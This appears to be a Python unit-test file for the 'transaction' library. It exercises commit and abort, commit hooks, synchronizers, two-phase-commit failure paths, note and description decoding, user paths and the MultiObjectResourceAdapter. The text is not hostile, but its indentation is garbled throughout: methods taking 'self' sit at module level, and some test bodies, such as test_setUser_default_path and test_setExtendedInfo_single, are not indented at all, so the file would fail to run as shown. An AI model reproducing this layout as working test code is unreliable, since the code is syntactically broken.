        logger._clear()
        mgr = txn._manager = _Mgr(txn)
        txn.commit()
        self.assertEqual(txn.status, Status.COMMITTED)
        # commit() hands the transaction back to its manager.
        self.assertTrue(mgr._txn is None)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'commit')
def test_commit_w_savepoints(self):
    """commit() invalidates all outstanding savepoints."""
    from weakref import WeakKeyDictionary
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _SP(object):
        def __init__(self, txn, index):
            self.transaction = txn
            self._index = index
        def __repr__(self):
            return '_SP: %d' % self._index
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._savepoint2index = WeakKeyDictionary()
        holdme = []
        for i in range(10):
            sp = _SP(txn, i)
            holdme.append(sp)  # prevent gc
            txn._savepoint2index[sp] = i
        logger._clear()
        txn.commit()
        self.assertEqual(list(txn._savepoint2index), [])
def test_commit_w_beforeCommitHooks(self):
    """Before-commit hooks run with their registered args and are cleared."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._before_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._before_commit.append((_hook2, (), {}))
        logger._clear()
        txn.commit()
        self.assertEqual(_hooked1, [(('one',), {'uno': 1})])
        self.assertEqual(_hooked2, [((), {})])
        self.assertEqual(txn._before_commit, [])
def test_commit_w_synchronizers(self):
    """Every synchronizer is told before and after completion on commit."""
    from transaction.weakset import WeakSet
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Synch(object):
        _before = _after = False
        def beforeCompletion(self, txn):
            self._before = txn
        def afterCompletion(self, txn):
            self._after = txn
    synchs = [_Synch(), _Synch(), _Synch()]
    ws = WeakSet()
    for synch in synchs:
        ws.add(synch)
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne(synchronizers=ws)
        logger._clear()
        txn.commit()
        for synch in synchs:
            self.assertTrue(synch._before is txn)
            self.assertTrue(synch._after is txn)
def test_commit_w_afterCommitHooks(self):
    """After-commit hooks get the commit status (True) prepended to their args."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._after_commit.append((_hook2, (), {}))
        logger._clear()
        txn.commit()
        self.assertEqual(_hooked1, [((True, 'one',), {'uno': 1})])
        self.assertEqual(_hooked2, [((True,), {})])
        self.assertEqual(txn._after_commit, [])
        self.assertEqual(txn._resources, [])
def test_commit_error_w_afterCompleteHooks(self):
    """On a failed commit, after-commit hooks run with status False and good resources are aborted."""
    from transaction import _transaction
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    class BrokenResource(object):
        def sortKey(self):
            return 'zzz'
        def tpc_begin(self, txn):
            raise ValueError('test')
    broken = BrokenResource()
    resource = Resource('aaa')
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._after_commit.append((_hook2, (), {}))
        txn._resources.append(broken)
        txn._resources.append(resource)
        logger._clear()
        self.assertRaises(ValueError, txn.commit)
        # Hooks still run, but with status False.
        self.assertEqual(_hooked1, [((False, 'one',), {'uno': 1})])
        self.assertEqual(_hooked2, [((False,), {})])
        self.assertEqual(txn._after_commit, [])
        # 'aaa' sorts before the broken resource: begun, then aborted.
        self.assertTrue(resource._b)
        self.assertFalse(resource._c)
        self.assertFalse(resource._v)
        self.assertFalse(resource._f)
        self.assertTrue(resource._a)
        self.assertTrue(resource._x)
def test_commit_error_w_synchronizers(self):
    """Synchronizers are notified after completion even when commit fails."""
    from transaction.weakset import WeakSet
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Synch(object):
        _before = _after = False
        def beforeCompletion(self, txn):
            self._before = txn
        def afterCompletion(self, txn):
            self._after = txn
    synchs = [_Synch(), _Synch(), _Synch()]
    ws = WeakSet()
    for synch in synchs:
        ws.add(synch)
    class BrokenResource(object):
        def sortKey(self):
            return 'zzz'
        def tpc_begin(self, txn):
            raise ValueError('test')
    broken = BrokenResource()
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne(synchronizers=ws)
        logger._clear()
        txn._resources.append(broken)
        self.assertRaises(ValueError, txn.commit)
        for synch in synchs:
            self.assertTrue(synch._before is txn)
            self.assertTrue(synch._after is txn)  # called in _cleanup
def test_commit_clears_resources(self):
    """A successful two-phase commit empties the joined-resources list."""
    class DataManager(object):
        # Minimal happy-path two-phase-commit participant.
        def tpc_begin(self, txn):
            return True
        def commit(self, txn):
            return True
        def tpc_vote(self, txn):
            return True
        def tpc_finish(self, txn):
            return True
    manager = DataManager()
    transaction = self._makeOne()
    transaction.join(manager)
    self.assertEqual(transaction._resources, [manager])
    transaction.commit()
    self.assertEqual(len(transaction._resources), 0)
def test_getBeforeCommitHooks_empty(self):
    """A fresh transaction has no before-commit hooks."""
    hooks = list(self._makeOne().getBeforeCommitHooks())
    self.assertEqual(hooks, [])
def test_addBeforeCommitHook(self):
    """addBeforeCommitHook records the hook with its args and kwargs."""
    def _hook(*args, **kw):
        pass
    txn = self._makeOne()
    txn.addBeforeCommitHook(_hook, ('one',), dict(uno=1))
    self.assertEqual(list(txn.getBeforeCommitHooks()),
                     [(_hook, ('one',), {'uno': 1})])
def test_addBeforeCommitHook_w_kws(self):
    """Omitted kwargs default to an empty dict.

    NOTE(review): despite the '_w_kws' name, no kwargs are passed —
    this mirrors test_addAfterCommitHook_wo_kws and is likely a
    misnomer for '_wo_kws'; name kept to preserve the test id.
    """
    def _hook(*args, **kw):
        pass
    txn = self._makeOne()
    txn.addBeforeCommitHook(_hook, ('one',))
    self.assertEqual(list(txn.getBeforeCommitHooks()),
                     [(_hook, ('one',), {})])
def test_getAfterCommitHooks_empty(self):
    """A fresh transaction has no after-commit hooks."""
    hooks = list(self._makeOne().getAfterCommitHooks())
    self.assertEqual(hooks, [])
def test_addAfterCommitHook(self):
    """addAfterCommitHook records the hook with its args and kwargs."""
    def _hook(*args, **kw):
        pass
    txn = self._makeOne()
    txn.addAfterCommitHook(_hook, ('one',), dict(uno=1))
    self.assertEqual(list(txn.getAfterCommitHooks()),
                     [(_hook, ('one',), {'uno': 1})])
def test_addAfterCommitHook_wo_kws(self):
    """Omitted kwargs default to an empty dict."""
    def _hook(*args, **kw):
        pass
    txn = self._makeOne()
    txn.addAfterCommitHook(_hook, ('one',))
    self.assertEqual(list(txn.getAfterCommitHooks()),
                     [(_hook, ('one',), {})])
def test_callAfterCommitHook_w_error(self):
    """A raising after-commit hook is logged; later hooks still run."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked2 = []
    def _hook1(*args, **kw):
        raise ValueError()
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn.addAfterCommitHook(_hook1, ('one',))
        txn.addAfterCommitHook(_hook2, ('two',), dict(dos=2))
        txn._callAfterCommitHooks()
        # second hook gets called even if first raises
        self.assertEqual(_hooked2, [((True, 'two',), {'dos': 2})])
        self.assertEqual(len(logger._log), 1)
        self.assertEqual(logger._log[0][0], 'error')
        self.assertTrue(logger._log[0][1].startswith(
            "Error in after commit hook"))
def test_callAfterCommitHook_w_abort(self):
    """A raising after-commit hook produces an error log entry."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked2 = []
    def _hook1(*args, **kw):
        raise ValueError()
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn.addAfterCommitHook(_hook1, ('one',))
        txn.addAfterCommitHook(_hook2, ('two',), dict(dos=2))
        txn._callAfterCommitHooks()
        self.assertEqual(logger._log[0][0], 'error')
        self.assertTrue(logger._log[0][1].startswith(
            "Error in after commit hook"))
def test__commitResources_normal(self):
    """Happy path: every resource is begun, committed, voted, finished, in sortKey order."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    resources = [Resource('bbb'), Resource('aaa')]
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn._resources.extend(resources)
        txn._commitResources()
        self.assertEqual(len(txn._voted), 2)
        for r in resources:
            self.assertTrue(r._b and r._c and r._v and r._f)
            self.assertFalse(r._a and r._x)
            self.assertTrue(id(r) in txn._voted)
        # Resources are processed in sortKey order: 'aaa' before 'bbb'.
        self.assertEqual(len(logger._log), 2)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
        self.assertEqual(logger._log[1][0], 'debug')
        self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
def test__commitResources_error_in_tpc_begin(self):
    """A tpc_begin failure aborts all resources before anything is committed."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    resources = [Resource('bbb', 'tpc_begin'), Resource('aaa')]
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn._resources.extend(resources)
        self.assertRaises(ValueError, txn._commitResources)
        for r in resources:
            # 'aaa' (sorted first) was begun; 'bbb' raised in tpc_begin.
            if r._key == 'aaa':
                self.assertTrue(r._b)
            else:
                self.assertFalse(r._b)
            self.assertFalse(r._c and r._v and r._f)
            self.assertTrue(r._a and r._x)
        self.assertEqual(len(logger._log), 0)
def test__commitResources_error_in_afterCompletion(self):
    """A failing afterCompletion synchronizer stops later notifications during cleanup.

    NOTE(review): '_Synchrnonizers' is a typo for '_Synchronizers' in
    the local helper class name; behavior is unaffected.
    """
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Synchrnonizers(object):
        def __init__(self, res):
            self._res = res
        def map(self, func):
            for res in self._res:
                func(res)
    resources = [Resource('bbb', 'tpc_begin'),
                 Resource('aaa', 'afterCompletion')]
    sync = _Synchrnonizers(resources)
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne(sync)
        logger._clear()
        txn._resources.extend(resources)
        self.assertRaises(ValueError, txn._commitResources)
        for r in resources:
            if r._key == 'aaa':
                self.assertTrue(r._b)
            else:
                self.assertFalse(r._b)
            self.assertFalse(r._c and r._v and r._f)
            self.assertTrue(r._a and r._x)
        self.assertEqual(len(logger._log), 0)
        # Only the first synchronizer was notified; the second raised.
        self.assertTrue(resources[0]._after)
        self.assertFalse(resources[1]._after)
def test__commitResources_error_in_commit(self):
    """A commit() failure aborts all resources; only earlier ones were committed."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    resources = [Resource('bbb', 'commit'), Resource('aaa')]
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn._resources.extend(resources)
        self.assertRaises(ValueError, txn._commitResources)
        for r in resources:
            self.assertTrue(r._b)
            if r._key == 'aaa':
                self.assertTrue(r._c)
            else:
                self.assertFalse(r._c)
            self.assertFalse(r._v and r._f)
            self.assertTrue(r._a and r._x)
        self.assertEqual(len(logger._log), 1)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
def test__commitResources_error_in_tpc_vote(self):
    """A tpc_vote failure: already-voted resources are not aborted, others are."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    resources = [Resource('bbb', 'tpc_vote'), Resource('aaa')]
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn._resources.extend(resources)
        self.assertRaises(ValueError, txn._commitResources)
        self.assertEqual(len(txn._voted), 1)
        for r in resources:
            self.assertTrue(r._b and r._c)
            if r._key == 'aaa':
                # Voted before the failure: tpc_abort only, no abort.
                self.assertTrue(id(r) in txn._voted)
                self.assertTrue(r._v)
                self.assertFalse(r._f)
                self.assertFalse(r._a)
                self.assertTrue(r._x)
            else:
                self.assertFalse(id(r) in txn._voted)
                self.assertFalse(r._v)
                self.assertFalse(r._f)
                self.assertTrue(r._a and r._x)
        self.assertEqual(len(logger._log), 2)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
        self.assertEqual(logger._log[1][0], 'debug')
        self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
def test__commitResources_error_in_tpc_finish(self):
    """A tpc_finish failure is unrecoverable: no cleanup, critical log entry."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    resources = [Resource('bbb', 'tpc_finish'), Resource('aaa')]
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        txn._resources.extend(resources)
        self.assertRaises(ValueError, txn._commitResources)
        for r in resources:
            self.assertTrue(r._b and r._c and r._v)
            self.assertTrue(id(r) in txn._voted)
            if r._key == 'aaa':
                self.assertTrue(r._f)
            else:
                self.assertFalse(r._f)
            self.assertFalse(r._a and r._x)  # no cleanup if tpc_finish raises
        self.assertEqual(len(logger._log), 3)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'commit Resource: aaa')
        self.assertEqual(logger._log[1][0], 'debug')
        self.assertEqual(logger._log[1][1], 'commit Resource: bbb')
        self.assertEqual(logger._log[2][0], 'critical')
        self.assertTrue(logger._log[2][1].startswith(
            'A storage error occurred'))
def test_abort_wo_savepoints_wo_hooks_wo_synchronizers(self):
    """A bare abort leaves status ACTIVE, frees the manager, and logs 'abort'."""
    from transaction._transaction import Status
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Mgr(object):
        def __init__(self, txn):
            self._txn = txn
        def free(self, txn):
            assert txn is self._txn
            self._txn = None
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        logger._clear()
        mgr = txn._manager = _Mgr(txn)
        txn.abort()
        # Note: abort does not change the status away from ACTIVE.
        self.assertEqual(txn.status, Status.ACTIVE)
        self.assertTrue(mgr._txn is None)
        self.assertEqual(logger._log[0][0], 'debug')
        self.assertEqual(logger._log[0][1], 'abort')
def test_abort_w_savepoints(self):
    """abort() invalidates all outstanding savepoints."""
    from weakref import WeakKeyDictionary
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _SP(object):
        def __init__(self, txn, index):
            self.transaction = txn
            self._index = index
        def __repr__(self):
            return '_SP: %d' % self._index
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._savepoint2index = WeakKeyDictionary()
        holdme = []
        for i in range(10):
            sp = _SP(txn, i)
            holdme.append(sp)  # prevent gc
            txn._savepoint2index[sp] = i
        logger._clear()
        txn.abort()
        self.assertEqual(list(txn._savepoint2index), [])
def test_abort_w_beforeCommitHooks(self):
    """abort() neither calls nor clears registered before-commit hooks."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._before_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._before_commit.append((_hook2, (), {}))
        logger._clear()
        txn.abort()
        self.assertEqual(_hooked1, [])
        self.assertEqual(_hooked2, [])
        # Hooks are neither called nor cleared on abort
        self.assertEqual(list(txn.getBeforeCommitHooks()),
                         [(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
def test_abort_w_synchronizers(self):
    """Every synchronizer is told before and after completion on abort."""
    from transaction.weakset import WeakSet
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Synch(object):
        _before = _after = False
        def beforeCompletion(self, txn):
            self._before = txn
        def afterCompletion(self, txn):
            self._after = txn
    synchs = [_Synch(), _Synch(), _Synch()]
    ws = WeakSet()
    for synch in synchs:
        ws.add(synch)
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne(synchronizers=ws)
        logger._clear()
        txn.abort()
        for synch in synchs:
            self.assertTrue(synch._before is txn)
            self.assertTrue(synch._after is txn)
def test_abort_w_afterCommitHooks(self):
    """abort() neither calls nor clears registered after-commit hooks."""
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._after_commit.append((_hook2, (), {}))
        logger._clear()
        txn.abort()
        # Hooks are neither called nor cleared on abort
        self.assertEqual(_hooked1, [])
        self.assertEqual(_hooked2, [])
        self.assertEqual(list(txn.getAfterCommitHooks()),
                         [(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
        self.assertEqual(txn._resources, [])
def test_abort_error_w_afterCompleteHooks(self):
    """A raising resource.abort propagates after all resources were tried; hooks untouched."""
    from transaction import _transaction
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    class BrokenResource(object):
        def sortKey(self):
            return 'zzz'
        def abort(self, txn):
            raise ValueError('test')
    broken = BrokenResource()
    aaa = Resource('aaa')
    broken2 = BrokenResource()
    _hooked1, _hooked2 = [], []
    def _hook1(*args, **kw):
        _hooked1.append((args, kw))
    def _hook2(*args, **kw):
        _hooked2.append((args, kw))
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        txn = self._makeOne()
        txn._after_commit.append((_hook1, ('one',), {'uno': 1}))
        txn._after_commit.append((_hook2, (), {}))
        txn._resources.append(aaa)
        txn._resources.append(broken)
        txn._resources.append(broken2)
        logger._clear()
        self.assertRaises(ValueError, txn.abort)
        # Hooks are neither called nor cleared on abort
        self.assertEqual(_hooked1, [])
        self.assertEqual(_hooked2, [])
        self.assertEqual(list(txn.getAfterCommitHooks()),
                         [(_hook1, ('one',), {'uno': 1}), (_hook2, (), {})])
        # The good resource was aborted (but not tpc_abort-ed).
        self.assertTrue(aaa._a)
        self.assertFalse(aaa._x)
def test_abort_error_w_synchronizers(self):
    """Synchronizers are notified after completion even when abort fails."""
    from transaction.weakset import WeakSet
    from transaction.tests.common import DummyLogger
    from transaction.tests.common import Monkey
    from transaction import _transaction
    class _Synch(object):
        _before = _after = False
        def beforeCompletion(self, txn):
            self._before = txn
        def afterCompletion(self, txn):
            self._after = txn
    synchs = [_Synch(), _Synch(), _Synch()]
    ws = WeakSet()
    for synch in synchs:
        ws.add(synch)
    class BrokenResource(object):
        def sortKey(self):
            return 'zzz'
        def abort(self, txn):
            raise ValueError('test')
    broken = BrokenResource()
    logger = DummyLogger()
    with Monkey(_transaction, _LOGGER=logger):
        t = self._makeOne(synchronizers=ws)
        logger._clear()
        t._resources.append(broken)
        self.assertRaises(ValueError, t.abort)
        for synch in synchs:
            self.assertTrue(synch._before is t)
            self.assertTrue(synch._after is t)  # called in _cleanup
def test_abort_clears_resources(self):
    """abort() empties the joined-resources list."""
    class DataManager(object):
        def abort(self, txn):
            return True
    manager = DataManager()
    transaction = self._makeOne()
    transaction.join(manager)
    self.assertEqual(transaction._resources, [manager])
    transaction.abort()
    self.assertEqual(len(transaction._resources), 0)
def test_note(self):
    """note() sets the description; later notes append on a new line."""
    txn = self._makeOne()
    try:
        txn.note(u'This is a note.')
        self.assertEqual(txn.description, u'This is a note.')
        txn.note(u'Another.')
        self.assertEqual(txn.description, u'This is a note.\nAnother.')
    finally:
        txn.abort()
    def test_note_bytes(self):
        """Bytes passed to note() are decoded to text, with a deprecation warning."""
        txn = self._makeOne()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.note(b'haha')
        self.assertNonTextDeprecationWarning(w)
        self.assertEqual(txn.description, u'haha')
    def test_note_None(self):
        """note(None) is a no-op: no warning, description left empty."""
        txn = self._makeOne()
        self.assertEqual(u'', txn.description)
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.note(None)
        self.assertFalse(w)
        self.assertEqual(txn.description, u'')
    def test_note_42(self):
        """Non-text note() values are stringified, with a deprecation warning."""
        txn = self._makeOne()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.note(42)
        self.assertNonTextDeprecationWarning(w)
        self.assertEqual(txn.description, u'42')
    def assertNonTextDeprecationWarning(self, w):
        """Assert *w* holds exactly one 'Expected text' DeprecationWarning.

        *w* is the list captured by ``warnings.catch_warnings(record=True)``;
        the single warning must also originate from this test module
        (filenames compared with their extension stripped, so .py vs .pyc
        does not matter).
        """
        [w] = w
        self.assertEqual(
            (DeprecationWarning, "Expected text",
             os.path.splitext(__file__)[0]),
            (w.category, str(w.message), os.path.splitext(w.filename)[0]),
        )
    def test_description_bytes(self):
        """Assigning bytes to description decodes to text with a warning."""
        txn = self._makeOne()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.description = b'haha'
        self.assertNonTextDeprecationWarning(w)
        self.assertEqual(txn.description, u'haha')
    def test_description_42(self):
        """Assigning a non-text value to description stringifies with a warning."""
        txn = self._makeOne()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.description = 42
        self.assertNonTextDeprecationWarning(w)
        self.assertEqual(txn.description, u'42')
    def test_description_None(self):
        """Assigning None to description is a silent no-op."""
        txn = self._makeOne()
        self.assertEqual(u'', txn.description)
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            txn.description = None
        self.assertFalse(w)
        self.assertEqual(txn.description, u'')
def test_setUser_default_path(self):
txn = self._makeOne()
txn.setUser(u'phreddy')
self.assertEqual(txn.user, u'/ phreddy')
    def test_setUser_explicit_path(self):
        """setUser() with an explicit path prefixes that path."""
        txn = self._makeOne()
        txn.setUser(u'phreddy', u'/bedrock')
        self.assertEqual(txn.user, u'/bedrock phreddy')
    def test_user_w_none(self):
        """Assigning None to ``user`` raises ValueError and keeps the old value."""
        txn = self._makeOne()
        txn.user = b'phreddy'
        with self.assertRaises(ValueError):
            txn.user = None  # rejected: user must be text, not None
        self.assertEqual(txn.user, u'phreddy')
    def _test_user_non_text(self, user, path, expect, both=False):
        """Helper: set a non-text user/path and check warnings and result.

        *path* selects the API exercised: truthy -> ``setUser(user, path)``;
        ``None`` -> ``setUser(user)`` (default path); any other falsy value
        (e.g. ``False``) -> direct ``txn.user`` assignment.  *both* means two
        deprecation warnings are expected (user AND path both non-text).
        """
        txn = self._makeOne()
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            if path:
                txn.setUser(user, path)
            else:
                if path is None:
                    txn.setUser(user)
                else:
                    txn.user = user
        if both:
            self.assertNonTextDeprecationWarning(w[:1])
            self.assertNonTextDeprecationWarning(w[1:])
        else:
            self.assertNonTextDeprecationWarning(w)
        self.assertEqual(expect, txn.user)
    def test_user_non_text(self, user=b'phreddy', path=b'/bedrock',
                           expect=u"/bedrock phreddy", both=True):
        """Exercise every user/path text-vs-bytes combination."""
        # NOTE(review): the parameters above are never used -- the body calls
        # _test_user_non_text with literal arguments only; they look like a
        # refactoring leftover and could be dropped.
        self._test_user_non_text(b'phreddy', b'/bedrock',
                                 u"/bedrock phreddy", True)
        self._test_user_non_text(b'phreddy', None, u'/ phreddy')
        self._test_user_non_text(b'phreddy', False, u'phreddy')
        self._test_user_non_text(b'phreddy', u'/bedrock', u'/bedrock phreddy')
        self._test_user_non_text(u'phreddy', b'/bedrock', u'/bedrock phreddy')
        self._test_user_non_text(u'phreddy', 2, u'2 phreddy')
        self._test_user_non_text(1, u'/bedrock', u'/bedrock 1')
        self._test_user_non_text(1, 2, u'2 1', True)
def test_setExtendedInfo_single(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
self.assertEqual(txn.extension, {u'frob': 'qux'})
self.assertTrue(txn._extension is txn._extension) # legacy
def test_setExtendedInfo_multiple(self):
txn = self._makeOne()
txn.setExtendedInfo('frob', 'qux')
txn.setExtendedInfo('baz', 'spam')
txn.setExtendedInfo('frob', 'quxxxx')
self.assertEqual(txn._extension, {u'frob': 'quxxxx', u'baz': 'spam'})
self.assertTrue(txn._extension is txn._extension) # legacy
    def test__extension_settable(self):
        """Assigning ``_extension`` directly merges with later setExtendedInfo()."""
        # Because ZEO sets it. I'll fix ZEO, but maybe something else will break
        txn = self._makeOne()
        txn._extension = dict(baz='spam')
        txn.setExtendedInfo('frob', 'qux')
        self.assertEqual(txn.extension, {u'frob': 'qux', 'baz': 'spam'})
    def test_data(self):
        """data()/set_data() store per-key values, discarded at commit."""
        txn = self._makeOne()
        # Can't get data that wasn't set:
        with self.assertRaises(KeyError) as c:
            txn.data(self)
        self.assertEqual(c.exception.args, (self,))
        data = dict(a=1)
        txn.set_data(self, data)
        self.assertEqual(txn.data(self), data)
        # Can't get something we haven't stored.
        with self.assertRaises(KeyError) as c:
            txn.data(data)
        self.assertEqual(c.exception.args, (data,))
        # When the transaction ends, data are discarded:
        txn.commit()
        with self.assertRaises(KeyError) as c:
            txn.data(self)
        self.assertEqual(c.exception.args, (self,))
    def test_isRetryableError_w_transient_error(self):
        """TransientError is always retryable."""
        from transaction.interfaces import TransientError
        from transaction._manager import TransactionManager
        txn = self._makeOne(manager=TransactionManager())
        txn._manager._txn = txn
        self.assertTrue(txn.isRetryableError(TransientError()))
    def test_isRetryableError_w_transient_subclass(self):
        """Subclasses of TransientError are retryable too."""
        from transaction.interfaces import TransientError
        from transaction._manager import TransactionManager
        class _Derived(TransientError):
            pass
        txn = self._makeOne(manager=TransactionManager())
        txn._manager._txn = txn
        self.assertTrue(txn.isRetryableError(_Derived()))
    def test_isRetryableError_w_normal_exception_no_resources(self):
        """A plain Exception is not retryable when no resource votes."""
        from transaction._manager import TransactionManager
        txn = self._makeOne(manager=TransactionManager())
        txn._manager._txn = txn
        self.assertFalse(txn.isRetryableError(Exception()))
    def test_isRetryableError_w_normal_exception_w_resource_voting_yes(self):
        """A resource's should_retry() returning True makes the error retryable."""
        from transaction._manager import TransactionManager
        class _Resource(object):
            def should_retry(self, err):
                return True
        txn = self._makeOne(manager=TransactionManager())
        txn._manager._txn = txn
        txn._resources.append(_Resource())
        self.assertTrue(txn.isRetryableError(Exception()))
    def test_isRetryableError_w_multiple(self):
        """One yes vote among multiple resources suffices for retryability."""
        from transaction._manager import TransactionManager
        class _Resource(object):
            _should = True
            def should_retry(self, err):
                return self._should
        txn = self._makeOne(manager=TransactionManager())
        txn._manager._txn = txn
        res1 = _Resource()
        res1._should = False  # votes no; res2 still votes yes
        res2 = _Resource()
        txn._resources.append(res1)
        txn._resources.append(res2)
        self.assertTrue(txn.isRetryableError(Exception()))
class MultiObjectResourceAdapterTests(unittest.TestCase):
    """Tests for transaction._transaction.MultiObjectResourceAdapter."""
    def _getTargetClass(self):
        from transaction._transaction import MultiObjectResourceAdapter
        return MultiObjectResourceAdapter
    def _makeOne(self, jar):
        return self._getTargetClass()(jar)
    def _makeJar(self, key):
        # Resource subclass recording per-object commit/abort calls as
        # (obj, txn) pairs instead of boolean flags.
        class _Resource(Resource):
            def __init__(self, key):
                super(_Resource, self).__init__(key)
                self._c = []
                self._a = []
            def commit(self, obj, txn):
                self._c.append((obj, txn))
            def abort(self, obj, txn):
                self._a.append((obj, txn))
        return _Resource(key)
    def _makeDummy(self, kind, name):
        # Opaque placeholder object with a readable repr.
        class _Dummy(object):
            def __init__(self, kind, name):
                self._kind = kind
                self._name = name
            def __repr__(self):
                return '<%s: %s>' % (self._kind, self._name)
        return _Dummy(kind, name)
    def test_ctor(self):
        jar = self._makeJar('aaa')
        mora = self._makeOne(jar)
        self.assertTrue(mora.manager is jar)
        self.assertEqual(mora.objects, [])
        self.assertEqual(mora.ncommitted, 0)
    def test___repr__(self):
        jar = self._makeJar('bbb')
        mora = self._makeOne(jar)
        self.assertEqual(repr(mora),
                         '<MultiObjectResourceAdapter '
                         'for Resource: bbb at %s>' % id(mora))
    def test_sortKey(self):
        jar = self._makeJar('ccc')
        mora = self._makeOne(jar)
        self.assertEqual(mora.sortKey(), 'ccc')
    def test_tpc_begin(self):
        jar = self._makeJar('ddd')
        mora = self._makeOne(jar)
        txn = object()
        mora.tpc_begin(txn)
        self.assertTrue(jar._b)
    def test_commit(self):
        # commit() forwards each tracked object to the jar, in order.
        jar = self._makeJar('eee')
